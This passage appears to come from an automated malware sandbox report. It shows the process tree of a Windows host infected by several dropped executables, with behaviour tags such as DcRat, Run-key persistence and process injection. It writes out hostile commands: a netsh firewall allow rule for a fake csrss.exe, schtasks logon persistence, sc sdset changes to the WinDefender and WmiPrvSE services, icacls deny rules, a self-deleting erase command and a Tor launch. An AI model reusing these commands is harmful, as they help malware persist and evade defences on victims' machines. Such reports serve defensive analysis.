                                                              • C:\Users\Admin\Pictures\Adobe Films\ZWGcYtRUGEhgsgAy6Z1gOtWJ.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\ZWGcYtRUGEhgsgAy6Z1gOtWJ.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                • Drops file in Windows directory
                                                                • Modifies data under HKEY_USERS
                                                                PID:5356
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                  4⤵
                                                                    PID:5428
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                      5⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:5532
                                                                  • C:\Windows\rss\csrss.exe
                                                                    C:\Windows\rss\csrss.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Drops file in Windows directory
                                                                    PID:5668
                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                      5⤵
                                                                      • DcRat
                                                                      • Creates scheduled task(s)
                                                                      PID:5856
                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                      schtasks /delete /tn ScheduledUpdate /f
                                                                      5⤵
                                                                        PID:5872
                                                                      • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:6088
                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                        5⤵
                                                                        • DcRat
                                                                        • Creates scheduled task(s)
                                                                        PID:5944
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                        5⤵
                                                                          PID:2580
                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                            sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                            6⤵
                                                                            • Launches sc.exe
                                                                            PID:1412
                                                                        • C:\Windows\windefender.exe
                                                                          "C:\Windows\windefender.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:4828
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                            6⤵
                                                                              PID:4952
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                7⤵
                                                                                • Launches sc.exe
                                                                                PID:4064
                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                                                                            5⤵
                                                                              PID:4632
                                                                      • C:\Users\Admin\Pictures\Adobe Films\kzKYaZZ3A8Z3adLGazacqc5t.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\kzKYaZZ3A8Z3adLGazacqc5t.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4320
                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                          attrib -?
                                                                          3⤵
                                                                          • Views/modifies file attributes
                                                                          PID:4108
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
                                                                          3⤵
                                                                            PID:1620
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd
                                                                              4⤵
                                                                                PID:3764
                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                  tasklist /FI "imagename eq PSUAService.exe"
                                                                                  5⤵
                                                                                  • Enumerates processes with tasklist
                                                                                  PID:5452
                                                                                • C:\Windows\SysWOW64\find.exe
                                                                                  find /I /N "psuaservice.exe"
                                                                                  5⤵
                                                                                    PID:5472
                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                    findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
                                                                                    5⤵
                                                                                      PID:5552
                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tal.exe.pif
                                                                                      Tal.exe.pif H
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5604
                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tal.exe.pif
                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tal.exe.pif
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1004
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping -n 5 localhost
                                                                                    4⤵
                                                                                    • Runs ping.exe
                                                                                    PID:5632
                                                                              • C:\Users\Admin\Pictures\Adobe Films\QW7GgYOEuTcPjNLKdw2BB6tk.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\QW7GgYOEuTcPjNLKdw2BB6tk.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2456
                                                                                • C:\Users\Admin\Pictures\Adobe Films\QW7GgYOEuTcPjNLKdw2BB6tk.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\QW7GgYOEuTcPjNLKdw2BB6tk.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:3624
                                                                              • C:\Users\Admin\Pictures\Adobe Films\3P0vEfNdwMEJ8JDIdCIHJXhQ.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\3P0vEfNdwMEJ8JDIdCIHJXhQ.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:2484
                                                                              • C:\Users\Admin\Pictures\Adobe Films\464Kp2er6EuzXaB6O8__Bmh3.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\464Kp2er6EuzXaB6O8__Bmh3.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks computer location settings
                                                                                PID:4644
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "464Kp2er6EuzXaB6O8__Bmh3.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\464Kp2er6EuzXaB6O8__Bmh3.exe" & exit
                                                                                  3⤵
                                                                                    PID:2040
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /im "464Kp2er6EuzXaB6O8__Bmh3.exe" /f
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1860
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 1364
                                                                                    3⤵
                                                                                    • Program crash
                                                                                    PID:4224
                                                                                • C:\Users\Admin\Pictures\Adobe Films\iVQM0xMW6hzwPHNWW0vYsxOO.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\iVQM0xMW6hzwPHNWW0vYsxOO.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:908
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\iVQM0xMW6hzwPHNWW0vYsxOO.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\iVQM0xMW6hzwPHNWW0vYsxOO.exe"
                                                                                    3⤵
                                                                                    • DcRat
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    • Adds Run key to start application
                                                                                    • Modifies system certificate store
                                                                                    PID:4676
                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                      icacls "C:\Users\Admin\AppData\Local\71372fc4-7460-482f-8839-218ea6fcb8f2" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                      4⤵
                                                                                      • Modifies file permissions
                                                                                      PID:4668
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\iVQM0xMW6hzwPHNWW0vYsxOO.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\iVQM0xMW6hzwPHNWW0vYsxOO.exe" --Admin IsNotAutoStart IsNotTask
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5020
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\iVQM0xMW6hzwPHNWW0vYsxOO.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\iVQM0xMW6hzwPHNWW0vYsxOO.exe" --Admin IsNotAutoStart IsNotTask
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks computer location settings
                                                                                        PID:4404
                                                                                        • C:\Users\Admin\AppData\Local\1efc2567-da65-4d62-a150-83707035f44f\build2.exe
                                                                                          "C:\Users\Admin\AppData\Local\1efc2567-da65-4d62-a150-83707035f44f\build2.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:1600
                                                                                          • C:\Users\Admin\AppData\Local\1efc2567-da65-4d62-a150-83707035f44f\build2.exe
                                                                                            "C:\Users\Admin\AppData\Local\1efc2567-da65-4d62-a150-83707035f44f\build2.exe"
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks processor information in registry
                                                                                            PID:3144
                                                                                • C:\Users\Admin\Pictures\Adobe Films\wrWAOWereWYNbEYIiIiTIZFY.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\wrWAOWereWYNbEYIiIiTIZFY.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:868
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-PUOP7.tmp\wrWAOWereWYNbEYIiIiTIZFY.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-PUOP7.tmp\wrWAOWereWYNbEYIiIiTIZFY.tmp" /SL5="$20440,140559,56832,C:\Users\Admin\Pictures\Adobe Films\wrWAOWereWYNbEYIiIiTIZFY.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:1656
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-E07MG.tmp\3alouch.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-E07MG.tmp\3alouch.exe" /S /UID=Irecch4
                                                                                      4⤵
                                                                                      • Drops file in Drivers directory
                                                                                      • Executes dropped EXE
                                                                                      • Checks computer location settings
                                                                                      • Adds Run key to start application
                                                                                      • Drops file in Program Files directory
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2068
                                                                                      • C:\Users\Admin\AppData\Local\Temp\4d-d8e63-7e1-9dc88-13e852a90f1b5\Vyshitarosho.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\4d-d8e63-7e1-9dc88-13e852a90f1b5\Vyshitarosho.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4276
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                          6⤵
                                                                                          • Adds Run key to start application
                                                                                          • Enumerates system info in registry
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                          PID:2064
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff9b3446f8,0x7fff9b344708,0x7fff9b344718
                                                                                            7⤵
                                                                                              PID:4068
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
                                                                                              7⤵
                                                                                                PID:2268
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
                                                                                                7⤵
                                                                                                  PID:2212
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
                                                                                                  7⤵
                                                                                                    PID:4056
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                                                                                                    7⤵
                                                                                                      PID:4208
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                                                                                      7⤵
                                                                                                        PID:216
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5124 /prefetch:8
                                                                                                        7⤵
                                                                                                          PID:896
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
                                                                                                          7⤵
                                                                                                            PID:5572
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5232 /prefetch:8
                                                                                                            7⤵
                                                                                                              PID:6136
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                                                                                                              7⤵
                                                                                                                PID:2900
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
                                                                                                                7⤵
                                                                                                                  PID:1556
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
                                                                                                                  7⤵
                                                                                                                    PID:5248
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                                                                    7⤵
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:5452
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7703e5460,0x7ff7703e5470,0x7ff7703e5480
                                                                                                                      8⤵
                                                                                                                        PID:5548
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
                                                                                                                      7⤵
                                                                                                                        PID:5640
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
                                                                                                                        7⤵
                                                                                                                          PID:5084
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
                                                                                                                          7⤵
                                                                                                                            PID:4704
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:1
                                                                                                                            7⤵
                                                                                                                              PID:1128
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6396340708683334275,17805182005758140119,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                                                                                                                              7⤵
                                                                                                                                PID:6392
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0f-791f7-d65-9bc8b-a0ac435e4e1a9\Lipodaevoxy.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\0f-791f7-d65-9bc8b-a0ac435e4e1a9\Lipodaevoxy.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4340
                                                                                                                          • C:\Program Files\7-Zip\ZSTXEAQAQM\irecord.exe
                                                                                                                            "C:\Program Files\7-Zip\ZSTXEAQAQM\irecord.exe" /VERYSILENT
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1140
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-A9D3C.tmp\irecord.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-A9D3C.tmp\irecord.tmp" /SL5="$104BE,5808768,66560,C:\Program Files\7-Zip\ZSTXEAQAQM\irecord.exe" /VERYSILENT
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              PID:784
                                                                                                                              • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:2100
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 2124
                                                                                                                      2⤵
                                                                                                                      • Program crash
                                                                                                                      PID:1908
                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                    1⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:2196
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2440 -ip 2440
                                                                                                                    1⤵
                                                                                                                      PID:3272
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4644 -ip 4644
                                                                                                                      1⤵
                                                                                                                        PID:3112
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 392 -ip 392
                                                                                                                        1⤵
                                                                                                                          PID:4368
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4892 -ip 4892
                                                                                                                          1⤵
                                                                                                                            PID:2544
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2384 -ip 2384
                                                                                                                            1⤵
                                                                                                                              PID:3360
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1288 -ip 1288
                                                                                                                              1⤵
                                                                                                                                PID:2492
                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4304
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                  PID:5316
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4884 -ip 4884
                                                                                                                                  1⤵
                                                                                                                                    PID:3972
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:5472
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:5132
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 972
                                                                                                                                        2⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:2492
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5312
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 484
                                                                                                                                        2⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:5532
                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                      1⤵
                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                      PID:2124
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                        2⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:5176
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
